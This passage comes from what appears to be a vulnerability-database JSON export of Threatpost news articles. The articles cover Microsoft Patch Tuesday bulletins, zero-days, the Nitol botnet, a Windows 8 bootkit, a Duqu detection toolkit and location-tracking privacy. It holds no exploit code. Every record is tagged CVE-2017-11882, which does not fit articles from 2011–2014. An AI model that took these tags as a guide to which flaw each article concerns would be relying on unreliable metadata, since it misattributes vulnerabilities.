XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>). The company previously announced its plans to effectively end support for the operating system on April 8.\n\nThe first bulletin will address a remote code execution in Microsoft\u2019s Sharepoint Server and Microsoft Word, the third will fix an elevation of privilege in Windows 7 and Server 2008 R2 and the last bulletin will fix a denial of service (DoS) issue in Microsoft\u2019s enterprise resource planning software, Dynamics AX.\n\nPer usual Microsoft will push updates for the software in question next Tuesday and post patch analysis and deployment guidance on its Security Response Center blog.\n", "cvss3": {}, "published": "2014-01-09T13:02:31", "type": "threatpost", "title": "Microsoft to Patch Zero Day in January 2014 Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-01-14T19:04:09", "id": "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "href": "https://threatpost.com/microsoft-expected-to-patch-xp-zero-day-on-patch-tuesday/103591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:43", "description": "Microsoft will, next week, patch a [zero-day vulnerability in its GDI+ graphics component](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) being exploited in targeted attacks in the Middle East and Asia.\n\nThe zero day has sat unpatched since it was made public Nov. 5; Microsoft did release a FixIt tool as a temporary mitigation. The patch is one of 11 bulletins Microsoft said today it will release as part of its [December 2013 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-dec>); five of the bulletins will be rated critical.\n\nMicrosoft did confirm, however, that a [zero day in the NDProxy driver](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) that manages the Microsoft Telephony API on Windows XP systems will not be patched. That zero day is also being exploited in the wild alongside a PDF exploit of a patched Adobe Reader flaw.\n\nThe GDI+ vulnerability is found in several versions of Windows and Office and enables an attacker to gain remote-code execution, but only on Windows Vista, Windows Server 2008, and Office 2003 through 2010. The vulnerability exists in the way the GDI+ component handles TIFF images. Microsoft said an attacker would have to entice a victim to preview or open a malicious TIFF attachment or visit a website hosting the exploit image.\n\nTuesday\u2019s critical patches address remote code execution vulnerabilities in a number of Microsoft products, including not only Windows and Office, but Lync, Internet Explorer and Exchange. Vulnerabilities in SharePoint, Lync, SingnalR and ASP.NET are among those rated important by Microsoft. Those vulnerabilities are primarily privilege escalation issues as well as an information disclosure bug.\n\nThis will be the last scheduled release of security updates from Microsoft for the year. It looks like Tuesday\u2019s updates will bring the 2013 count to 106 bulletins, up sharply from 83 last year, according to Qualys CTO Wolfgang Kandek. Microsoft had similar numbers of bulletins in 2011 (100) and 2010 (106).\n\n\u201cRegarding 0-days, Microsoft has consistently pointed out that the additional security toolkit EMET (Enhanced Mitigation Experience Toolkit) has been effective against all of the 0-day problems this year,\u201d Kandek said. \u201cWe believe it is a proactive security measure that organizations should evaluate and consider as an additional layer in their defensive measures.\u201d\n\nThe XP zero-day, meanwhile, will likely be left for the January 2014 Patch Tuesday updates. The vulnerability is a privilege escalation vulnerability and allows kernel access.\n\nFireEye researchers said they found the exploit in the wild being used [alongside a PDF-based exploit](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html>) against a patched Adobe Reader vulnerability. Reader versions 9.5.4, 10.1.6, 11.0.02 and earlier on XP SP3 are affected, later versions are not, FireEye said, adding that this exploit gives a local user the ability to execute code in the kernel, such as install new software, manipulate data, or create new accounts. The exploit cannot be used remotely, the company said.\n\nMicrosoft recommended deleting the NDProxy.sys driver as a workaround; the mitigation, however, will impact TAPI operations.\n\n\u201cSystem administrators everywhere must have made Microsoft\u2019s naughty list because this holiday \u2018gift\u2019 is clearly a lump of coal,\u201d said Tyler Reguly, technical manager of security research and development at Tripwire. \u201cMicrosoft is wrapping up the 2013 patch season with anything that was laying around. Someone should tell Microsoft they forgot to include the kitchen sink.\u201d\n", "cvss3": {}, "published": "2013-12-05T16:07:42", "type": "threatpost", "title": "TIFF Zero Day Patch Among December 2013 Microsoft updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-05T21:07:43", "id": "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "href": "https://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft announced Wednesday afternoon that it has pulled [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>), one of the patches issued yesterday for vulnerabilities in Exchange Server 2013.\n\nMicrosoft said the patch is causing issues with the content index for mailbox databases. Organizations would still be able to send and receive email, but would not be able to search for messages on the server.\n\n\u201cAfter the installation of the security update, the content index for mailbox databases shows as Failed and the Microsoft Exchange Search Host Controller service is renamed,\u201d Microsoft principal program manager Ross Smith said in a [post](<http://blogs.technet.com/b/exchange/archive/2013/08/14/exchange-2013-security-update-ms13-061-status-update.aspx>) on the company\u2019s Exchange site.\n\nSmith added that patches for Exchange 2007 and 2010 were not pulled back because both use a different indexing architecture and are not impacted.\n\nOrganizations that have already installed the patch are urged to follow the steps outlined in a [Knowledge Base article](<http://support.microsoft.com/kb/2879739>) released today as a workaround until a new patch is available. The workaround involves the editing of two separate registry keys.\n\nExperts, however, think the number of companies immediately applying the patch could be relatively low given the criticality of Exchange servers to enterprises. Most likely, an Exchange patch, even a critical one, would have been reserved for a maintenance window overnight or on a weekend.\n\nThe patch was essentially the integration of an Oracle patch released last month for Outside In, a technology that turns unstructured file formats such as PDFs into normalized files. Outside In is part of Exchange\u2019s WebReady Document Viewing and Data Loss Prevention features.\n\nAn attacker would be able to exploit the vulnerability in question if a user opened or previewed a malicious file attachment using Outlook Web Access (OWA) giving the attacker the same privileges as the victim on the Exchange Server.\n\n\u201cThis is a fairly important patch in terms of criticality given that it\u2019s the mail server and not a workstation,\u201d said Qualys CTO Wolfgang Kandek.\n\nThe issue is amplified because with the OWA module on Exchange, the browser pulls a message into Exchange and using Outside In, processes the message on Exchange exposing the server to attack.\n\nKandek said organizations that don\u2019t allow OWA or turn off a visualization mode that renders documents are not affected; documents such as PDFs instead would be processed by a reader such as Adobe or Foxit avoiding the attack vector.\n\nIn the meantime, Kandek said he hopes Microsoft is transparent about the reason for faulty patch and why it wasn\u2019t caught in testing.\n\n\u201cI think it\u2019s important because we tell people they should install patches as quickly as possible,\u201d Kandek said. \u201cWhen a patch breaks, that\u2019s an issue.\u201d\n\nThe Exchange patch was one of three critical bulletins sent out yesterday in Microsoft\u2019s August Patch Tuesday updates.\n", "cvss3": {}, "published": "2013-08-14T16:51:00", "type": "threatpost", "title": "Faulty Microsoft Exchange Server 2013 Patch Pulled Back", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-14T20:51:00", "id": "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "href": "https://threatpost.com/microsoft-pulls-back-critical-exchange-server-2013-patch/101999/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft took less than a month to incorporate an [Oracle Outside In patch](<http://threatpost.com/hefty-oracle-july-critical-patch-update-contains-89-patches/101370>) and fix a critically rated remote code execution bug in Exchange Servers. The Microsoft patch is among three critical bulletins\u2014eight overall\u2014released today as part of [its August 2013 Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2013/08/13/leaving-las-vegas-and-the-august-2013-security-updates.aspx>).\n\nOracle patched Outside In with its [July Critical Patch Update (CPU)](<http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html#AppendixFMW>); the technology allows developers to turn unstructured file formats into normalized files. [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>) includes the Outside In Patch, which is part of the WebReady Document Viewing and Data Loss Prevention features on Exchange Servers. Exploits could allow an attacker to remotely execute code if a user previews or opens a malicious file using Outlook Web App (OWA). The attacker would have the same privileges as the transcoding services on the Exchange Server; that would be the LocalService account for WebReady Document Viewing and the Filtering Management service for the DLP feature. Both, however, run with minimal privileges.\n\n\u201cIf you run Exchange and your users have OWA, you should address this issue as quickly as possible,\u201d said Qualys CTO Wolfgang Kandek. Microsoft also recommends a workaround that turns off Outside In document processing.\n\n[MS13-059](<https://technet.microsoft.com/en-us/security/bulletin/ms13-059>) is another cumulative patch for Internet Explorer and repairs 11 remotely executable vulnerabilities in the browser, including a sandbox bypass vulnerability discovered and exploited by VUPEN researchers during the Pwn2Own contest in March. IE 6-10 is vulnerable to exploit; Microsoft said it is not aware of any active exploits for any of these vulnerabilities.\n\nThe IE rollup includes patches for nine memory corruption vulnerabilities, as well as fixes for a privilege escalation flaw in the way in which the browser handles process integrity level assignment and an information disclosure cross-site scripting vulnerability in EUC-JP character encoding, Microsoft said.\n\n\u201cAs usual with IE vulnerabilities, the attack vector would be a malicious webpage, either exploited by the attacker or it could be sent to the victim in a spear-phishing e-mail,\u201d Kandek said. \u201cPatch this immediately as the highest priority on your desktop system and wherever your users browse the web.\u201d\n\nThe final critical bulletin, [MS13-060](<https://technet.microsoft.com/en-us/security/bulletin/ms13-060>), patches a Windows vulnerability in the Unicode Scripts Processor; the patch corrects the way Windows parses certain OpenType font characteristics. An exploit could allow an attacker to run code remotely if a user opens a malicious document or visits a website that supports OpenType fonts.\n\n\u201cA user would have to be induced to open a malicious file and this only affects Windows XP and 2003,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cBoth of these issues should be patched ASAP.\u201d Microsoft also recommends two workarounds: either modifying the usp10.dll Access Control List to be more restrictive, or disabling support for parsing embedded fonts in IE.\n\nThe remaining bulletins were all rated Important by Microsoft.\n\n * [MS13-062](<https://technet.microsoft.com/en-us/security/bulletin/ms13-062>) patches a privilege escalation vulnerability in Windows RPC, correcting the manner in which Windows handles asynchronous RPC messages. \u201cPerhaps the most genuinely interesting vulnerability this month,\u201d Barrett said, adding that the bug is a post authentication issue in RPC. \u201cMicrosoft has described this as extremely difficult to exploit, which I can only assume is a challenge to exploit writers everywhere to prove them wrong.\u201d\n * [MS13-063](<https://technet.microsoft.com/en-us/security/bulletin/ms13-063>) is another privilege escalation issue in the Windows kernel. Four vulnerabilities are patched in this bulletin, the most severe of which enables elevated privileges if an attacker is able to log in locally and run a malicious application. In addition to memory corruption bugs, one of the vulnerabilities in this bulletin enables an attacker to bypass Address Space Layout Randomization (ASLR), a memory protection native to the OS.\n * [MS13-064](<https://technet.microsoft.com/en-us/security/bulletin/ms13-064>) patches a denial of service vulnerability in Windows NAT Driver. An attacker would have to send a malicious ICMP packet to a server running the NAT Driver services in order to exploit this bug, which affects only Windows Server 2012.\n * [MS13-065](<https://technet.microsoft.com/en-us/security/bulletin/ms13-065>) also fixes a denial of service bug in ICMPv6; Vista, Windows Server 2008, Windows &, Windows 8, Windows RT and Windows Server 2012 are affected by this bug.\n * [MS13-066](<https://technet.microsoft.com/en-us/security/bulletin/ms13-066>) patches an information-disclosure vulnerability in Active Directory Federation Services on Windows Server 2008 and Windows Server 2012. An exploit could force the service to leak information on the service and allow an attacker to use that information to try to log in remotely.\n", "cvss3": {}, "published": "2013-08-13T14:28:51", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-13T18:28:51", "id": "THREATPOST:270516BE92D218A333101B23448C3ED3", "href": "https://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:22", "description": "Another month, another set of [Microsoft Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-aug>) for Internet Explorer.\n\nFor what seems to be the umpteenth month in a row, Microsoft will patch its browser, one of three critical updates expected to be shipped on Tuesday among eight bulletins.\n\nWhile IE patches remain a constant in 2013, IT administrators and network managers also need to be aware of a critical set of patches for Microsoft Exchange Server 2013, as well as 2010 and 2007, both of which are on Service Pack 3.\n\nThe critical bugs in IE, Exchange Server and the Windows OS are all rated critical because they are remotely exploitable; it\u2019s unknown today how many are being actively exploited.\n\n\u201cAcross the board, all supported versions of Microsoft Exchange Server are affected by a critical vulnerability,\u201d said Tripwire security researcher Craig Young. \u201cIf I remember correctly, the last time we saw this was back in February when it was revealed that the transcoding service used to render content for Outlook Web Access sessions could be abused for remote code execution in the context of that service. Exchange servers are invariably connected to the Internet in some form or another so it\u2019s going to be urgent to patch this one post-haste.\u201d\n\n[MS13-012](<http://technet.microsoft.com/en-us/security/bulletin/ms13-012>), released in February, patched [vulnerabilities in the Exchange WebReady Document Viewing](<http://threatpost.com/microsoft-patches-critical-ie-vulnerabilities-021213/77519>) feature; if a user viewed a malicious file through OWA in a browser, an attacker could run code on the Exchange server remotely or crash the server.\n\nRoss Barrett, senior manager of security engineering at Rapid7, said the Exchange patches should be of the greatest concern to organizations.\n\n\u201cIf this is truly a remotely exploitable issue that does not require user interaction, then it\u2019s a potentially wormable issue and definitely should be put at the top of the patching priority list,\u201d Barrett said.\n\nIE, meanwhile, is about to be patched for the eighth time this year including an [out-of-band patch](<http://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/77403>) in January to address exploits being used in a number of watering hole attacks.\n\nThe third critical bulletin addresses vulnerabilities in Windows XP and Windows Server 2003 that are remotely exploitable.\n\n\u201cFor some organizations this patch may be of less concern, if they have already moved to newer Windows versions,\u201d Barrett said.\n\nThe remaining bulletins are rated \u201cImportant\u201d by Microsoft based on whether they are remotely exploitable and whether exploits are in the wild. All of the \u201cImportant\u201d bulletins patch vulnerabilities in Windows; two of them are privilege escalation bugs, two are denial-of-service vulnerabilities and one information disclosure flaw.\n", "cvss3": {}, "published": "2013-08-08T15:28:06", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:07:04", "id": "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "href": "https://threatpost.com/critical-ie-exchange-updates-on-tap-in-august-patch-tuesday-release/101943/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "[![Nitol botnet](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073029/nitolbotnet.jpg)](<https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/>)When Microsoft went after the [Nitol botnet](<https://threatpost.com/microsoft-carries-out-nitol-botnet-takedown-091312/>) in September, one of the key details in the investigation was the fact that much of the botnet was built by pre-loading malware onto laptops during the manufacturing process in China. This was the clearest case yet of the phenomenon of [certified pre-owned devices](<https://threatpost.com/new-study-sees-need-better-software-integrity-controls-061410/>) making their way through the supply chain and into the market. As it turns out, nearly half a million of those infected machines showed up here in the U.S.\n\nResearch from Microsoft into the location of the Nitol-infected machines shows that the large majority of them are in China, nearly 800,000 of them. That\u2019s more than 30 percent of all of the machines on which Microsoft detected the Nitol malware, and the company said that about one in every five machines purchased in China through the compromised supply chain had malware on it.\n\nAlthough the number of infected systems in the United States wasn\u2019t nearly as high as in China, Microsoft did find nearly 500,000 PCs in the U.S. loaded with Nitol, a pretty significant volume of infections.\n\n\u201cMMPC\u2019s infection figures for [Win32/Nitol](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32/Nitol> \"MMPC Encyclopedia entry for Win32/Nitol\" ) reflect the Microsoft study, placing China on the top spot with a whopping 31.60%, way above the United States (18.51%) and Taiwan (16.79%). Thailand and Korea round out the top five,\u201d [Rex Plantodo of the Microsoft Malware Protection Center.](<https://blogs.technet.com/b/mmpc/archive/2012/10/22/msrt-october-12-nitol-by-the-numbers.aspx?Redirected=true>)\n\nMicrosoft began looking into the Nitol botnet more than a year ago after buying 20 laptops in China and discovering that some of them had been pre-loaded with the Nitol malware, as well as a few other pieces of malicious software. Nitol is a nasty bit of code and has quite a list of malicious capabilities. It has rootkit functionality and also can laucnh DDoS attacks on orders from a remote command-and-control server.\n\nMicrosoft\u2019s takedown of Nitol disrupted much of the botnet\u2019s operations, but it didn\u2019t completely eliminate it. The company\u2019s detections show a major drop in Nitol infections since September, but there are still more than 200,000 infections in October.\n\n \n\n", "cvss3": {}, "published": "2012-10-24T17:59:06", "type": "threatpost", "title": "Nitol Infections Fall, But Malware Still Popping Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "href": "https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/77149/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:08", "description": "Microsoft will release seven bulletins in the [October Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-oct>) next week, fixing 20 total vulnerabilities in Windows, Office, Lync and SQL Server. Only one of the bulletins is rated critical, while the six others are rated important.\n\nThe one critical bulletin affects Microsoft Office 2003, 2007 and 2010 and Microsoft officials said that the bug it will fix can be used for remote code execution. The remaining six bulletins, which all are rated important, also can be used for remote code execution. \n\nThe other software affected by the October bulletins includes SharePoint, Groove Server, SQL Server 2000, 2005, 2008 and 2012. \n\nThe one critical bulletin will fix a flaw in Microsoft Word, company officials said.\n\n\u201cToday we\u2019re providing [advance notification](<http://technet.microsoft.com/security/bulletin/ms12-oct>) of the release of seven bulletins, one Critical and six Important, which address 20 vulnerabilities for October 2012. The Critical bulletin addresses vulnerabilities in Microsoft Word. The six Important-rated bulletins will address issues in Windows, Microsoft Office, and SQL Server. This release will also address the issue in FAST Search Server first described in [Security Advisory 2737111](<http://technet.microsoft.com/security/advisory/2737111>),\u201d Dustin Childs of Microsoft said.\n\nThat bug in FAST Search Server first came to light in July and also existed in Microsoft Exchange Server. \n\n\u201cThe vulnerabilities exist due to the way that files are parsed by the third-party, Oracle Outside In libraries. In the most severe case of Microsoft Exchange Server 2007 and Microsoft Exchange Server 2010, it is possible under certain conditions for the vulnerabilities to allow an attacker to take control of the server process that is parsing a specially crafted file. An attacker could then install programs; view, change, or delete data; or take any other action that the server process has access to do,\u201d Microsoft said in its security advisory at the time.\n", "cvss3": {}, "published": "2012-10-04T18:28:36", "type": "threatpost", "title": "Microsoft to Fix Critical Word Flaw in October Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:25", "id": "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "href": "https://threatpost.com/microsoft-fix-critical-word-flaw-october-patch-tuesday-100412/77083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:03", "description": "[![Windows patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065018/windowspatchmini.jpg)](<https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/>)Microsoft plans to issue seven security bulletins in the [January Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release next week, fixing six vulnerabilities rated important and one rated critical. The bugs affect a variety of products, including Windows XP, Vista, Windows 7, Server 2003 and 2008 and Microsoft Developer Tools and Software.\n\nJust three of the seven bulletins Microsoft will issue on Jan. 10 will fix a vulnerability that could lead to remote code execution. The others can either lead to elevation of privilege or information disclosure. However, there is one bulletin that Microsoft has said can also lead to \u201csecurity feature bypass,\u201d something that isn\u2019t typically seen on the company\u2019s security bulletins.\n\n\u201cIn addition, eagle-eyed readers of the summary page will notice an unusual vulnerability classification, \u2018Security Feature Bypass,\u2019 for one of our Important-severity bulletins. SFB-class issues in themselves can\u2019t be leveraged by an attacker; rather, a would-be attacker would use them to facilitate use of another exploit. For those interested in learning more, we expect the SRD blog to publish a detailed analysis of the matter on Tuesday,\u201d Microsoft\u2019s Angela Gunn wrote in a blog post.\n\nThe company will release full information on the patches and which vulnerabilities they apply to on Tuesday.\n", "cvss3": {}, "published": "2012-01-06T15:08:03", "type": "threatpost", "title": "Microsoft to Issue Seven Bulletins, One Critical, on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "href": "https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/76067/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:21", "description": "A security researcher who has in the past has created low-level rootkits capable of staying resident on an infected machine after reboots, said he has now accomplished the same feat on Windows 8, which hasn\u2019t even hit the shelves yet. Peter Kleissner said he has created a new version of his Stoned bootkit that defeats the pre-boot security checks included in the forthcoming OS and survives reboots.\n\nKleissner is known in the security community for his creation of the [Stoned bootkit](<http://www.stoned-vienna.com/>), a sophisticated form of rootkit that is designed to load from the master boot record and stay resident in memory throughout the boot process. The previous version of the bootkit was designed to work on Windows XP through Windows 7, but the new one that Kleissner has written also works on Windows 8. He said in a message on Twitter Thursday that Stoned Lite is a small footprint bootkit that can be loaded from either a USB stick or a CD.\n\nHe said he may also add some other functionality to the software in the near future.\n\n\u201cMight add in-memory patching of msv1_0!MsvpPasswordValidate, so it allows to log on with any password.. nothing new but nice and fancy,\u201d Kleissner said in a later Twitter message.\n\nThe pre-boot security mechanisms in Windows 8 have drawn a lot of scrutiny in recent months, particularly the fact that [Microsoft is implementing a version of UEFI](<https://threatpost.com/secure-boot-windows-8-worries-researchers-092211/>) instead of the traditional BIOS. UEFI includes some functionality that allows Microsoft to require that any software loaded during the boot sequence of a Windows PC be signed by one of the keys loaded into the firmware. Open-source advocates have argued that the technology could allow the company to prevent users from loading alternate operating systems, but Microsoft and [officials from the Linux Foundation](<https://threatpost.com/linux-foundation-says-uefi-doesnt-have-prevent-other-os-installations-110111/>) have said that isn\u2019t necessarily the case.\n\nKleissner said that he notified Microsoft of his work and has given the company the source code of the bootkit and the paper he\u2019s written for a conference presentation.\n\nMicrosoft has not confirmed the details of Kleissner\u2019s claims.\n", "cvss3": {}, "published": "2011-11-17T20:42:19", "type": "threatpost", "title": "New Version of Stoned Bootkit Said to Bypass Windows 8 Secure Boot", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:19", "id": "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "href": "https://threatpost.com/new-version-stoned-bootkit-said-bypass-windows-8-secure-boot-111711/75909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:25", "description": "The Hungarian research facility that helped discover Duqu, the [much-blogged about](<https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/>) Trojan, has now released an open-source toolkit that can be used to help detect traces and instances of the worm.\n\nThe Laboratory of Cryptography and System Security (CrySys) at the Budapest University of Technology and Economics developed the [Duqu Detector Toolkit v1.01](<http://www.crysys.hu/duqudetector.html>) to be used on computers and networks where the malware may have already been removed from the system. Duqu \u2013 a cousin of the Stuxnet worm that infected uranium enrichment facilities in Iran, famously had a hard-coded 36 day lifespan. But ystems may still retain certain Duqu files even after the virus has deactivated itself.By focusing on what they refer to as \u201csuspicious files,\u201d the toolkit can \u201cdetect new, modified versions of the Duqu threat,\u201d CrySys said. \n\nLike other toolkits, CrySys claims the tool could still generate false positives and therefore encourages a professional looks over the log files of each test.\n\nAs Threatpost [previously reported](<https://threatpost.com/duqu-installer-contains-windows-kernel-zero-day-110111/>), users can be infected with Duqu after opening a particular Word document that exploits a flaw in Windows\u2019 Win32k TrueType font parsing engine and lead to remote code execution. Microsoft has maintained they\u2019re working on a patch for the bug but in the meantime, [released a workaround](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) for the kernel flaw late last week.\n", "cvss3": {}, "published": "2011-11-10T16:17:49", "type": "threatpost", "title": "New Toolkit Able to Track and Trace Duqu Worm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:22", "id": "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "href": "https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/75879/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Redmond, Washington software giant, Microsoft, and Detroit based GM subsidiary, OnStar backtracked on policies widely seen as egregious privacy violations following lawsuits and public outcry. Here\u2019s the news:\n\n**Windows Phone Update Requires User Consent For Tracking**\n\nMicrosoft released their \u201cMango\u201d update, which, according to a report by Tom Warren on [Winrumors](<http://www.winrumors.com/windows-phone-7-5-no-longer-accesses-location-data-without-authorization/>), updates the Windows Phone, addressing widespread accusations and [a related lawsuit](<https://threatpost.com/class-action-lawsuit-accuses-microsoft-illegal-geotagging-090211/>) that the company had been tracking device locations without reasonable consent.\n\nIn a location and privacy FAQ on the Microsoft website, the company staunchly claims that the location information stored within the Windows Phone 7 devices is intended to gather information about nearby Wi-Fi access points and provide users with location based services more efficiently and effectively; this information does not uniquely identify or track devices, they say.\n\nHowever, the company also says they discovered that some of that information had been periodically relayed back to Microsoft when users access the camera application and use its US-English voice command feature. (Whoops!) This relay of information, Microsoft claims, is an unintended behavior. The latest update resolves these and other issues. Now users will have to agree if they want to the Camera application to tag photo location. Voice Command will no longer request location information at all.\n\nFor more information, read the FAQ [here](<http://www.microsoft.com/windowsphone/en-us/howto/wp7/web/location-and-my-privacy.aspx>).\n\n**OnStar Won\u2019t Force Automated Location Tracking**\n\nOnStar found itself in a similar situation after it was discovered that the vehicle navigation and emergency notification service was to begin [monitoring the speed and location of vehicles](<https://threatpost.com/onstar-track-speed-location-cars-even-after-opting-out-092111/>) equipped with OnStar technology on December 1, even if those owners decided to opt-out or cancel OnStar\u2019s services.\n\nA press release published yesterday on the OnStar website announced that the company is revising their proposed terms and conditions to make it clear that customer data will not be collected after a customer cancels their OnStar service.\n\n\u201cWe realize that our proposed amendments did not satisfy our subscribers,\u201d OnStar President Linda Marshall said in the statement. \u201cThis is why we are leaving the decision in our customers\u2019 hands. We listened, we responded and we hope to maintain the trust of our more than 6 million customers.\u201d\n\nThe appearance of GPS and other location tracking technologies in mobile phones, cars and other devices has [raised concerns among privacy and civil liberties advocates in the U.S. and elsewhere](<https://threatpost.com/location-based-services-raise-privacy-security-risks-082510/>). An analysis by the Wall Street Journal found that iPhones running version 4 of the company\u2019s iOS operating system appeared to [track a user\u2019s location and movement](<https://threatpost.com/report-iphones-track-movement-even-location-services-disabled-042511/>) of whether the user enabled or disabled location tracking. Like Microsoft, Apple claimed that the phones weren\u2019t tracking specific users\u2019 movements, just using the company\u2019s huge user base to assemble an accurate list of active cell phone towers and WiFi hotspots. Software vendors, also, have been discovered to be collecting location data, often quite apart from the kind of service they are providing. In just one example, the mobile phone application for the Pandora music streaming service was [found to be harvesting user location data](<https://threatpost.com/pandora-mobile-app-transmits-gobs-personal-data-040611/>). \n\nSecurity experts have wondered, aloud, [how else the company might use the location and movement data that is collected](<https://threatpost.com/iphones-location-and-threats-your-assets-042711/>), including how it might be used by third party advertisers. \n", "cvss3": {}, "published": "2011-09-28T18:07:32", "type": "threatpost", "title": "Blowback: Microsoft, OnStar Pump the Brakes on Location Tracking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:07:09", "id": "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "href": "https://threatpost.com/blowback-microsoft-onstar-pump-breaks-implicit-gps-tracking-092811/75700/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Microsoft warned Monday this year\u2019s crop of tax scams are using social engineering attacks based on fear to spread Zdowbot and Omaneat banking Trojans and collect personal info via spoofed tax sites linked to from phishing campaigns.\n\nThe warning comes with less than a month before the April 18 tax deadline and add to an already busy tax season of scams reported by various security experts and the U.S. Internal Revenue Service.\n\n\u201cThese attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules, but they peak in the months leading to U.S. Tax Day in mid-April,\u201d warned Microsoft on its [Malware Protection Center blog](<https://blogs.technet.microsoft.com/mmpc/2017/03/20/tax-themed-phishing-and-malware-attacks-proliferate-during-the-tax-filing-season/>).\n\nEmail ploys reported by Microsoft include messages with the subject lines \u201cYou are eligible!\u201d and \u201cConfirmation of your tax refund\u201d and \u201cSubpoena from IRS\u201d. Microsoft says scammers are also targeting certified public accountants with email subject lines \u201cI need a CPA\u201d.\n\nIn one tax-based scam example, Microsoft found a malicious Word document contained in an email that warn recipients they face pending tax-related law enforcement 